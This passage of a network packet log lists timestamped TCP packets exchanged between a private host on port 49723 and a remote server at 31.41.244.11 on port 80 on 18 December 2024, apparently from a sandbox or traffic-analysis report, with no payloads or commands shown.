Dec 18, 2024 13:38:49.552103996 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.552939892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.553057909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.553113937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.553189039 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.554097891 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.554225922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.554271936 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.554313898 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.555268049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.555464983 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.555525064 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.556488037 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.556687117 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.556723118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.556828022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.557599068 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.557737112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.557796001 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.557871103 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.558768034 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.558826923 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.558962107 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.559082031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.560183048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.560249090 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.560376883 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.560452938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.561434984 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.561506987 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.561517954 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.561564922 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.562311888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.562514067 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.562632084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.563549042 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.563642979 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.563673973 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.563731909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.564661026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.564738035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.564860106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.564935923 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.565790892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.565864086 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.566018105 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.566162109 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.567069054 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.567116022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.567279100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.567339897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.568234921 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.568332911 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.568360090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.568425894 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.569267988 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.569330931 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.569520950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.569591045 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.570574045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.570640087 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.570688963 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.570806026 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.571707010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.571841955 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.571842909 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.572109938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.572977066 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.573153019 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.573200941 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.573224068 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.574121952 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.574188948 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.574265957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.574389935 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.575567007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.575581074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.575639009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.575695038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.576560020 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.576689959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.576709032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.576852083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.577560902 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.577692986 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.577709913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.577806950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.578706980 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.578808069 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.578896046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.579003096 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.580007076 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.580173969 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.580183029 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.581091881 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.581325054 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.581352949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.581657887 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.582185030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.582252026 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.582449913 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.582509995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.583368063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.583458900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.583575964 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.583630085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.584580898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.584677935 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.584853888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.584954977 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.585776091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.585844994 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.585935116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.586922884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.587034941 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.587042093 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.587229967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.588152885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.588268995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.588308096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.588365078 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.589643002 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.589811087 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.589833021 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.589879990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.590756893 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.590838909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.590997934 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.591089010 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.592180014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.592226028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.592231989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.592297077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.592927933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.592998028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.593080997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.593136072 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.594063997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.594244957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.594296932 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.595099926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.595196009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.726161957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.726238966 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.726325035 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.726435900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.726435900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.726741076 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.726986885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.726986885 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.727071047 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.727940083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.728008032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.728068113 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.728234053 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.729044914 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.729170084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.729180098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.729234934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.730222940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.730305910 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.730400085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.730494022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.731417894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.731590033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.731704950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.732218981 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.732547045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.732625008 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.732770920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.732877970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.733915091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.734013081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.734103918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.734179974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.735002041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.735126019 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.735282898 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.736094952 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.736224890 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.736231089 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.736334085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.737221003 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.737405062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.737421036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.737471104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.738506079 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.738614082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.738672972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.738672972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.739612103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.739660025 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.739898920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.739958048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.740730047 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.740911961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.740926027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.740992069 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.741928101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.742088079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.742114067 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.742189884 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.743072033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.743144035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.743227959 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.743309975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.744251013 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.744345903 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.744498014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.744565010 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.745409966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.745487928 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.745610952 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.746000051 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.746653080 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.746793985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.746802092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.746893883 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.747771978 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.747915983 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.747925997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.747993946 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.748935938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.749069929 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.749094009 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.749133110 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.750107050 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.750183105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.750273943 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.750358105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.751337051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.751441002 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.751583099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.751904964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.752470970 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.752567053 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.752614975 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.752690077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.753719091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.753879070 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.753895998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.754015923 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.754795074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.754941940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.754972935 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.755033016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.755968094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.756146908 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.756294012 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.756453991 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.757138014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.757206917 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.757340908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.757433891 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.758404970 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.758534908 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.758553028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.758696079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.759512901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.759780884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.759891033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.759891033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.760682106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.760793924 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.760868073 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.760926962 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.761780024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.761826038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.761970043 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.762089968 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.762981892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.763032913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.763156891 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.763290882 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.764139891 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.764246941 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.764290094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.764379025 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.765324116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.765582085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.765727043 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.765806913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.766499996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.766661882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.766748905 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.767740965 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.767903090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.768007994 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.768842936 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.768929958 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.769001007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.769072056 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.770035982 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.770088911 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.770176888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.771195889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.771332979 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.771369934 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.771500111 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.772376060 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.772478104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.772547007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.772689104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.773500919 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.773598909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.773706913 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.773976088 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.774723053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.774805069 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.774835110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.774910927 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.775841951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.775917053 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.776004076 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.776109934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.777029037 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.777096987 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.777211905 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.777412891 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.778290987 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.778471947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.778537035 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.778589964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.779413939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.779515028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.779541969 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.779623985 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.780564070 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.780625105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.780683994 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.780750990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.781711102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.781812906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.781907082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.781985044 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.782843113 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.782936096 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.783056021 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.783165932 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.784006119 CET	80	49723	31.41.244.11	192.168.2.8
